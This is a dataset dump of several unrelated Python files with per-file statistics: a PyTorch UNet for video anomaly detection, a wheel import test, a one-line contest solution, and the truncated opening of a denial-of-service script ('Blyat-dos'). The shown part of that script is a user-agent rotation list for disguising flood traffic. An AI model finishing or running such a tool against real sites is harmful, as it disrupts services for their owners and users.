with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
| 44 | 128 | 0.66873 | 2,680 | 21,164 | 5.084701 | 0.080597 | 0.042783 | 0.01952 | 0.018493 | 0.923608 | 0.918471 | 0.915168 | 0.90805 | 0.905335 | 0.891245 | 0 | 0.006416 | 0.212058 | 21,164 | 480 | 129 | 44.091667 | 0.810746 | 0.018947 | 0 | 0.879227 | 0 | 0 | 0.18145 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 1 | 0.009662 | false | 0.002415 | 0.05314 | 0 | 0.062802 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24121fe1bd38ec93fed03837b938d2ef79c1c70f | 149 | py | Python | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | null | null | null | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | 1 | 2019-04-02T23:35:13.000Z | 2019-04-02T23:35:13.000Z | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | null | null | null | print("import: 'wheel'")
import wheel
print("import: 'wheel.signatures'")
import wheel.signatures
print("import: 'wheel.tool'")
import wheel.tool
| 14.9 | 35 | 0.731544 | 19 | 149 | 5.736842 | 0.263158 | 0.605505 | 0.440367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100671 | 149 | 9 | 36 | 16.555556 | 0.813433 | 0 | 0 | 0 | 0 | 0 | 0.412162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
2452bdab2851f574ec520fc26d8dc2db445c8fb7 | 39 | py | Python | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | print(input().replace("2017", "2018"))
| 19.5 | 38 | 0.641026 | 5 | 39 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0.051282 | 39 | 1 | 39 | 39 | 0.459459 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
79fe199c09201481d9e30428e6c7ccb12cb22e3f | 26,944 | py | Python | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 67 | 2020-08-29T19:25:49.000Z | 2022-03-21T06:36:42.000Z | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 20 | 2020-09-24T09:55:04.000Z | 2022-03-21T05:49:22.000Z | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 21 | 2020-09-14T08:07:35.000Z | 2022-03-16T12:24:16.000Z | import torch
import torch.nn as nn
class double_conv(nn.Module):
'''(conv => BN => ReLU) * 2'''
def __init__(self, in_ch, out_ch):
super(double_conv, self).__init__()
self.conv= nn.Sequential(
nn.Conv2d(in_channels=in_ch, out_channels=out_ch, kernel_size=3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=out_ch, out_channels=out_ch, kernel_size=3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
)
def forward(self, x):
x = self.conv(x)
return x
class inconv(nn.Module):
'''
inconv only changes the number of channels
'''
def __init__(self, in_ch, out_ch):
super(inconv, self).__init__()
self.conv = double_conv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class down(nn.Module):
def __init__(self, in_ch, out_ch):
super(down, self).__init__()
self.mpconv = nn.Sequential(
nn.MaxPool2d(kernel_size=2),
double_conv(in_ch, out_ch),
)
def forward(self, x):
x = self.mpconv(x)
return x
class up(nn.Module):
def __init__(self, in_ch, out_ch, bilinear=False):
super(up, self).__init__()
self.bilinear=bilinear
if self.bilinear:
self.up = nn.Sequential(nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(in_ch, in_ch//2, 1),)
else:
self.up = nn.ConvTranspose2d(in_channels=in_ch, out_channels=in_ch // 2, kernel_size=3, stride=2, padding=1, output_padding=1)
self.conv = double_conv(in_ch, out_ch)
def forward(self, x1, x2):
x1 = self.up(x1)
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
class outconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(outconv, self).__init__()
self.conv = nn.Conv2d(in_ch, out_ch, 1)
def forward(self, x):
x = self.conv(x)
return x
class SelfCompleteNet4(nn.Module): # 5raw1of
def __init__(self, features_root=32, tot_raw_num=5, tot_of_num=1, border_mode='predict', rawRange=None, useFlow=True, padding=True):
super(SelfCompleteNet4, self).__init__()
assert tot_of_num <= tot_raw_num
if border_mode == 'predict':
self.raw_center_idx = tot_raw_num - 1
self.of_center_idx = tot_of_num - 1
else:
self.raw_center_idx = (tot_raw_num - 1) // 2
self.of_center_idx = (tot_of_num - 1) // 2
if rawRange is None:
self.rawRange = range(tot_raw_num)
else:
if rawRange < 0:
rawRange += tot_raw_num
assert rawRange < tot_raw_num
self.rawRange = range(rawRange, rawRange+1)
self.raw_channel_num = 3 # RGB channel number.
self.of_channel_num = 2 # optical flow channel number.
self.tot_of_num = tot_of_num
self.tot_raw_num = tot_raw_num
self.raw_of_offset = self.raw_center_idx - self.of_center_idx
self.useFlow = useFlow
self.padding = padding
assert self.raw_of_offset >= 0
if self.padding:
in_channels = self.raw_channel_num * tot_raw_num
else:
in_channels = self.raw_channel_num * (tot_raw_num - 1)
raw_out_channels = self.raw_channel_num
of_out_channels = self.of_channel_num
# Different types of incomplete video events, each corresponding to a separate UNet.
# Raw pixel completion.
self.inc0 = inconv(in_channels, features_root)
self.down01 = down(features_root, features_root * 2)
self.down02 = down(features_root * 2, features_root * 4)
self.down03 = down(features_root * 4, features_root * 8)
self.inc1 = inconv(in_channels, features_root)
self.down11 = down(features_root, features_root * 2)
self.down12 = down(features_root * 2, features_root * 4)
self.down13 = down(features_root * 4, features_root * 8)
self.inc2 = inconv(in_channels, features_root)
self.down21 = down(features_root, features_root * 2)
self.down22 = down(features_root * 2, features_root * 4)
self.down23 = down(features_root * 4, features_root * 8)
self.inc3 = inconv(in_channels, features_root)
self.down31 = down(features_root, features_root * 2)
self.down32 = down(features_root * 2, features_root * 4)
self.down33 = down(features_root * 4, features_root * 8)
self.inc4 = inconv(in_channels, features_root)
self.down41 = down(features_root, features_root * 2)
self.down42 = down(features_root * 2, features_root * 4)
self.down43 = down(features_root * 4, features_root * 8)
self.up01 = up(features_root * 8, features_root * 4)
self.up02 = up(features_root * 4, features_root * 2)
self.up03 = up(features_root * 2, features_root)
self.outc0 = outconv(features_root, raw_out_channels)
self.up11 = up(features_root * 8, features_root * 4)
self.up12 = up(features_root * 4, features_root * 2)
self.up13 = up(features_root * 2, features_root)
self.outc1 = outconv(features_root, raw_out_channels)
self.up21 = up(features_root * 8, features_root * 4)
self.up22 = up(features_root * 4, features_root * 2)
self.up23 = up(features_root * 2, features_root)
self.outc2 = outconv(features_root, raw_out_channels)
self.up31 = up(features_root * 8, features_root * 4)
self.up32 = up(features_root * 4, features_root * 2)
self.up33 = up(features_root * 2, features_root)
self.outc3 = outconv(features_root, raw_out_channels)
self.up41 = up(features_root * 8, features_root * 4)
self.up42 = up(features_root * 4, features_root * 2)
self.up43 = up(features_root * 2, features_root)
self.outc4 = outconv(features_root, raw_out_channels)
# Optical flow completion.
if useFlow:
self.inc_of = inconv(in_channels, features_root)
self.down_of1 = down(features_root, features_root * 2)
self.down_of2 = down(features_root * 2, features_root * 4)
self.down_of3 = down(features_root * 4, features_root * 8)
self.up_of1 = up(features_root * 8, features_root * 4)
self.up_of2 = up(features_root * 4, features_root * 2)
self.up_of3 = up(features_root * 2, features_root)
self.outc_of = outconv(features_root, of_out_channels)
def forward(self, x, x_of):
# Use incomplete inputs to yield complete inputs.
all_raw_outputs = []
all_raw_targets = []
all_of_outputs = []
all_of_targets = []
for raw_i in self.rawRange:
if self.padding:
incomplete_x = x.clone()
incomplete_x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :] = 0
else:
incomplete_x = torch.cat([x[:, :raw_i * self.raw_channel_num, :, :], x[:, (raw_i+1) * self.raw_channel_num: , :, :]], dim=1)
all_raw_targets.append(x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :])
# Complete video events (raw pixel).
if raw_i == 0:
x1 = self.inc0(incomplete_x)
x2 = self.down01(x1)
x3 = self.down02(x2)
x4 = self.down03(x3)
raw = self.up01(x4, x3)
raw = self.up02(raw, x2)
raw = self.up03(raw, x1)
raw = self.outc0(raw)
all_raw_outputs.append(raw)
elif raw_i == 1:
x1 = self.inc1(incomplete_x)
x2 = self.down11(x1)
x3 = self.down12(x2)
x4 = self.down13(x3)
raw = self.up11(x4, x3)
raw = self.up12(raw, x2)
raw = self.up13(raw, x1)
raw = self.outc1(raw)
all_raw_outputs.append(raw)
elif raw_i == 2:
x1 = self.inc2(incomplete_x)
x2 = self.down21(x1)
x3 = self.down22(x2)
x4 = self.down23(x3)
raw = self.up21(x4, x3)
raw = self.up22(raw, x2)
raw = self.up23(raw, x1)
raw = self.outc2(raw)
all_raw_outputs.append(raw)
elif raw_i == 3:
x1 = self.inc3(incomplete_x)
x2 = self.down31(x1)
x3 = self.down32(x2)
x4 = self.down33(x3)
raw = self.up31(x4, x3)
raw = self.up32(raw, x2)
raw = self.up33(raw, x1)
raw = self.outc3(raw)
all_raw_outputs.append(raw)
elif raw_i == 4:
x1 = self.inc4(incomplete_x)
x2 = self.down41(x1)
x3 = self.down42(x2)
x4 = self.down43(x3)
raw = self.up41(x4, x3)
raw = self.up42(raw, x2)
raw = self.up43(raw, x1)
raw = self.outc4(raw)
all_raw_outputs.append(raw)
else:
print('out of range!')
raise NotImplementedError
# Complete video events (optical flow).
of_i = raw_i - self.raw_of_offset
if self.useFlow and 0 <= of_i < self.tot_of_num:
ofx1 = self.inc_of(incomplete_x)
ofx2 = self.down_of1(ofx1)
ofx3 = self.down_of2(ofx2)
ofx4 = self.down_of3(ofx3)
of = self.up_of1(ofx4, ofx3)
of = self.up_of2(of, ofx2)
of = self.up_of3(of, ofx1)
of = self.outc_of(of)
all_of_outputs.append(of)
all_of_targets.append(x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :])
all_raw_outputs = torch.cat(all_raw_outputs, dim=1)
all_raw_targets = torch.cat(all_raw_targets, dim=1)
if len(all_of_outputs) > 0:
all_of_outputs = torch.cat(all_of_outputs, dim=1)
all_of_targets = torch.cat(all_of_targets, dim=1)
return all_of_outputs, all_raw_outputs, all_of_targets, all_raw_targets
class SelfCompleteNetFull(nn.Module): # 5raw5of
def __init__(self, features_root=32, tot_raw_num=5, tot_of_num=5, border_mode='predict', rawRange=None, useFlow=True, padding=True):
super(SelfCompleteNetFull, self).__init__()
assert tot_of_num <= tot_raw_num
if border_mode == 'predict' or border_mode == 'elasticPredict':
self.raw_center_idx = tot_raw_num - 1
self.of_center_idx = tot_of_num - 1
else:
self.raw_center_idx = (tot_raw_num - 1) // 2
self.of_center_idx = (tot_of_num - 1) // 2
if rawRange is None:
self.rawRange = range(tot_raw_num)
else:
if rawRange < 0:
rawRange += tot_raw_num
assert rawRange < tot_raw_num
self.rawRange = range(rawRange, rawRange+1)
self.raw_channel_num = 3 # RGB channel number.
self.of_channel_num = 2 # optical flow channel number.
self.tot_of_num = tot_of_num
self.tot_raw_num = tot_raw_num
self.raw_of_offset = self.raw_center_idx - self.of_center_idx
self.useFlow = useFlow
self.padding = padding
assert self.raw_of_offset >= 0
if self.padding:
in_channels = self.raw_channel_num * tot_raw_num
else:
in_channels = self.raw_channel_num * (tot_raw_num - 1)
raw_out_channels = self.raw_channel_num
of_out_channels = self.of_channel_num
# Different types of incomplete video events, each corresponding to a separate UNet.
# Raw pixel completion.
self.inc0 = inconv(in_channels, features_root)
self.down01 = down(features_root, features_root * 2)
self.down02 = down(features_root * 2, features_root * 4)
self.down03 = down(features_root * 4, features_root * 8)
self.inc1 = inconv(in_channels, features_root)
self.down11 = down(features_root, features_root * 2)
self.down12 = down(features_root * 2, features_root * 4)
self.down13 = down(features_root * 4, features_root * 8)
self.inc2 = inconv(in_channels, features_root)
self.down21 = down(features_root, features_root * 2)
self.down22 = down(features_root * 2, features_root * 4)
self.down23 = down(features_root * 4, features_root * 8)
self.inc3 = inconv(in_channels, features_root)
self.down31 = down(features_root, features_root * 2)
self.down32 = down(features_root * 2, features_root * 4)
self.down33 = down(features_root * 4, features_root * 8)
self.inc4 = inconv(in_channels, features_root)
self.down41 = down(features_root, features_root * 2)
self.down42 = down(features_root * 2, features_root * 4)
self.down43 = down(features_root * 4, features_root * 8)
self.up01 = up(features_root * 8, features_root * 4)
self.up02 = up(features_root * 4, features_root * 2)
self.up03 = up(features_root * 2, features_root)
self.outc0 = outconv(features_root, raw_out_channels)
self.up11 = up(features_root * 8, features_root * 4)
self.up12 = up(features_root * 4, features_root * 2)
self.up13 = up(features_root * 2, features_root)
self.outc1 = outconv(features_root, raw_out_channels)
self.up21 = up(features_root * 8, features_root * 4)
self.up22 = up(features_root * 4, features_root * 2)
self.up23 = up(features_root * 2, features_root)
self.outc2 = outconv(features_root, raw_out_channels)
self.up31 = up(features_root * 8, features_root * 4)
self.up32 = up(features_root * 4, features_root * 2)
self.up33 = up(features_root * 2, features_root)
self.outc3 = outconv(features_root, raw_out_channels)
self.up41 = up(features_root * 8, features_root * 4)
self.up42 = up(features_root * 4, features_root * 2)
self.up43 = up(features_root * 2, features_root)
self.outc4 = outconv(features_root, raw_out_channels)
# Optical flow completion.
if useFlow:
self.inc_of0 = inconv(in_channels, features_root)
self.down_of01 = down(features_root, features_root * 2)
self.down_of02 = down(features_root * 2, features_root * 4)
self.down_of03 = down(features_root * 4, features_root * 8)
self.inc_of1 = inconv(in_channels, features_root)
self.down_of11 = down(features_root, features_root * 2)
self.down_of12 = down(features_root * 2, features_root * 4)
self.down_of13 = down(features_root * 4, features_root * 8)
self.inc_of2 = inconv(in_channels, features_root)
self.down_of21 = down(features_root, features_root * 2)
self.down_of22 = down(features_root * 2, features_root * 4)
self.down_of23 = down(features_root * 4, features_root * 8)
self.inc_of3 = inconv(in_channels, features_root)
self.down_of31 = down(features_root, features_root * 2)
self.down_of32 = down(features_root * 2, features_root * 4)
self.down_of33 = down(features_root * 4, features_root * 8)
self.inc_of4 = inconv(in_channels, features_root)
self.down_of41 = down(features_root, features_root * 2)
self.down_of42 = down(features_root * 2, features_root * 4)
self.down_of43 = down(features_root * 4, features_root * 8)
self.up_of01 = up(features_root * 8, features_root * 4)
self.up_of02 = up(features_root * 4, features_root * 2)
self.up_of03 = up(features_root * 2, features_root)
self.outc_of0 = outconv(features_root, of_out_channels)
self.up_of11 = up(features_root * 8, features_root * 4)
self.up_of12 = up(features_root * 4, features_root * 2)
self.up_of13 = up(features_root * 2, features_root)
self.outc_of1 = outconv(features_root, of_out_channels)
self.up_of21 = up(features_root * 8, features_root * 4)
self.up_of22 = up(features_root * 4, features_root * 2)
self.up_of23 = up(features_root * 2, features_root)
self.outc_of2 = outconv(features_root, of_out_channels)
self.up_of31 = up(features_root * 8, features_root * 4)
self.up_of32 = up(features_root * 4, features_root * 2)
self.up_of33 = up(features_root * 2, features_root)
self.outc_of3 = outconv(features_root, of_out_channels)
self.up_of41 = up(features_root * 8, features_root * 4)
self.up_of42 = up(features_root * 4, features_root * 2)
self.up_of43 = up(features_root * 2, features_root)
self.outc_of4 = outconv(features_root, of_out_channels)
def forward(self, x, x_of):
# Use incomplete inputs to yield complete inputs.
all_raw_outputs = []
all_raw_targets = []
all_of_outputs = []
all_of_targets = []
for raw_i in self.rawRange:
if self.padding:
incomplete_x = x.clone()
incomplete_x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :] = 0
else:
incomplete_x = torch.cat([x[:, :raw_i * self.raw_channel_num, :, :], x[:, (raw_i+1) * self.raw_channel_num: , :, :]], dim=1)
all_raw_targets.append(x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :])
if raw_i == 0:
x1 = self.inc0(incomplete_x)
x2 = self.down01(x1)
x3 = self.down02(x2)
x4 = self.down03(x3)
raw = self.up01(x4, x3)
raw = self.up02(raw, x2)
raw = self.up03(raw, x1)
raw = self.outc0(raw)
all_raw_outputs.append(raw)
elif raw_i == 1:
x1 = self.inc1(incomplete_x)
x2 = self.down11(x1)
x3 = self.down12(x2)
x4 = self.down13(x3)
raw = self.up11(x4, x3)
raw = self.up12(raw, x2)
raw = self.up13(raw, x1)
raw = self.outc1(raw)
all_raw_outputs.append(raw)
elif raw_i == 2:
x1 = self.inc2(incomplete_x)
x2 = self.down21(x1)
x3 = self.down22(x2)
x4 = self.down23(x3)
raw = self.up21(x4, x3)
raw = self.up22(raw, x2)
raw = self.up23(raw, x1)
raw = self.outc2(raw)
all_raw_outputs.append(raw)
elif raw_i == 3:
x1 = self.inc3(incomplete_x)
x2 = self.down31(x1)
x3 = self.down32(x2)
x4 = self.down33(x3)
raw = self.up31(x4, x3)
raw = self.up32(raw, x2)
raw = self.up33(raw, x1)
raw = self.outc3(raw)
all_raw_outputs.append(raw)
elif raw_i == 4:
x1 = self.inc4(incomplete_x)
x2 = self.down41(x1)
x3 = self.down42(x2)
x4 = self.down43(x3)
raw = self.up41(x4, x3)
raw = self.up42(raw, x2)
raw = self.up43(raw, x1)
raw = self.outc4(raw)
all_raw_outputs.append(raw)
else:
print('out of range!')
raise NotImplementedError
of_i = raw_i - self.raw_of_offset
if self.useFlow and 0 <= of_i < self.tot_of_num:
if of_i == 0:
ofx1 = self.inc_of0(incomplete_x)
ofx2 = self.down_of01(ofx1)
ofx3 = self.down_of02(ofx2)
ofx4 = self.down_of03(ofx3)
of = self.up_of01(ofx4, ofx3)
of = self.up_of02(of, ofx2)
of = self.up_of03(of, ofx1)
of = self.outc_of0(of)
all_of_outputs.append(of)
elif of_i == 1:
ofx1 = self.inc_of1(incomplete_x)
ofx2 = self.down_of11(ofx1)
ofx3 = self.down_of12(ofx2)
ofx4 = self.down_of13(ofx3)
of = self.up_of11(ofx4, ofx3)
of = self.up_of12(of, ofx2)
of = self.up_of13(of, ofx1)
of = self.outc_of1(of)
all_of_outputs.append(of)
elif of_i == 2:
ofx1 = self.inc_of2(incomplete_x)
ofx2 = self.down_of21(ofx1)
ofx3 = self.down_of22(ofx2)
ofx4 = self.down_of23(ofx3)
of = self.up_of21(ofx4, ofx3)
of = self.up_of22(of, ofx2)
of = self.up_of23(of, ofx1)
of = self.outc_of2(of)
all_of_outputs.append(of)
elif of_i == 3:
ofx1 = self.inc_of3(incomplete_x)
ofx2 = self.down_of31(ofx1)
ofx3 = self.down_of32(ofx2)
ofx4 = self.down_of33(ofx3)
of = self.up_of31(ofx4, ofx3)
of = self.up_of32(of, ofx2)
of = self.up_of33(of, ofx1)
of = self.outc_of3(of)
all_of_outputs.append(of)
elif of_i == 4:
ofx1 = self.inc_of4(incomplete_x)
ofx2 = self.down_of41(ofx1)
ofx3 = self.down_of42(ofx2)
ofx4 = self.down_of43(ofx3)
of = self.up_of41(ofx4, ofx3)
of = self.up_of42(of, ofx2)
of = self.up_of43(of, ofx1)
of = self.outc_of4(of)
all_of_outputs.append(of)
else:
print('out of optical flow range!')
raise NotImplementedError
all_of_targets.append(x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :])
all_raw_outputs = torch.cat(all_raw_outputs, dim=1)
all_raw_targets = torch.cat(all_raw_targets, dim=1)
if len(all_of_outputs) > 0:
all_of_outputs = torch.cat(all_of_outputs, dim=1)
all_of_targets = torch.cat(all_of_targets, dim=1)
return all_of_outputs, all_raw_outputs, all_of_targets, all_raw_targets
class SelfCompleteNet1raw1of(nn.Module): # 1raw1of
'''
rawRange: Int, the idx of raw inputs to be predicted
'''
def __init__(self, features_root=64, tot_raw_num=5, tot_of_num=1, border_mode='predict', rawRange=None, useFlow=True, padding=True):
super(SelfCompleteNet1raw1of, self).__init__()
assert tot_of_num <= tot_raw_num
if border_mode == 'predict':
self.raw_center_idx = tot_raw_num - 1
self.of_center_idx = tot_of_num - 1
else:
self.raw_center_idx = (tot_raw_num - 1) // 2
self.of_center_idx = (tot_of_num - 1) // 2
if rawRange is None:
self.rawRange = range(tot_raw_num)
else:
if rawRange < 0:
rawRange += tot_raw_num
assert rawRange < tot_raw_num
self.rawRange = range(rawRange, rawRange+1)
self.raw_channel_num = 3 # RGB channel no.
self.of_channel_num = 2 # optical flow channel no.
self.tot_of_num = tot_of_num
self.tot_raw_num = tot_raw_num
self.raw_of_offset = self.raw_center_idx - self.of_center_idx
self.useFlow = useFlow
self.padding = padding
assert self.raw_of_offset >= 0
if self.padding:
in_channels = self.raw_channel_num * tot_raw_num
else:
in_channels = self.raw_channel_num * (tot_raw_num - 1)
raw_out_channels = self.raw_channel_num
of_out_channels = self.of_channel_num
self.inc = inconv(in_channels, features_root)
self.down1 = down(features_root, features_root * 2)
self.down2 = down(features_root * 2, features_root * 4)
self.down3 = down(features_root * 4, features_root * 8)
# 0
self.up1 = up(features_root * 8, features_root * 4)
self.up2 = up(features_root * 4, features_root * 2)
self.up3 = up(features_root * 2, features_root)
self.outc = outconv(features_root, raw_out_channels)
if useFlow:
self.inc_of = inconv(in_channels, features_root)
self.down_of1 = down(features_root, features_root * 2)
self.down_of2 = down(features_root * 2, features_root * 4)
self.down_of3 = down(features_root * 4, features_root * 8)
self.up_of1 = up(features_root * 8, features_root * 4)
self.up_of2 = up(features_root * 4, features_root * 2)
self.up_of3 = up(features_root * 2, features_root)
self.outc_of = outconv(features_root, of_out_channels)
def forward(self, x, x_of):
# use incomplete inputs to yield complete inputs
if self.padding:
incomplete_x = x.clone()
incomplete_x[:, (self.tot_raw_num - 1) * self.raw_channel_num: , :, :] = 0
else:
incomplete_x = x[:, :(self.tot_raw_num - 1) * self.raw_channel_num, :, :]
raw_target = x[:, (self.tot_raw_num - 1) * self.raw_channel_num: , :, :]
x1 = self.inc(incomplete_x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
raw = self.up1(x4, x3)
raw = self.up2(raw, x2)
raw = self.up3(raw, x1)
raw_output = self.outc(raw)
of_i = self.tot_raw_num - 1 - self.raw_of_offset
if self.useFlow:
ofx1 = self.inc_of(incomplete_x)
ofx2 = self.down_of1(ofx1)
ofx3 = self.down_of2(ofx2)
ofx4 = self.down_of3(ofx3)
of = self.up_of1(ofx4, ofx3)
of = self.up_of2(of, ofx2)
of = self.up_of3(of, ofx1)
of_output = self.outc_of(of)
of_target = x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :]
return of_output, raw_output, of_target, raw_target
| 41.135878 | 140 | 0.566731 | 3,575 | 26,944 | 3.993566 | 0.056783 | 0.214331 | 0.06556 | 0.042866 | 0.880787 | 0.85172 | 0.841493 | 0.81999 | 0.768859 | 0.70484 | 0 | 0.053979 | 0.333061 | 26,944 | 654 | 141 | 41.198777 | 0.740512 | 0.028281 | 0 | 0.714286 | 0 | 0 | 0.00444 | 0 | 0 | 0 | 0 | 0 | 0.016917 | 1 | 0.030075 | false | 0 | 0.003759 | 0 | 0.06391 | 0.005639 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
032ea63652b9c6478d6cea77afd77d9cab453845 | 63,494 | py | Python | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
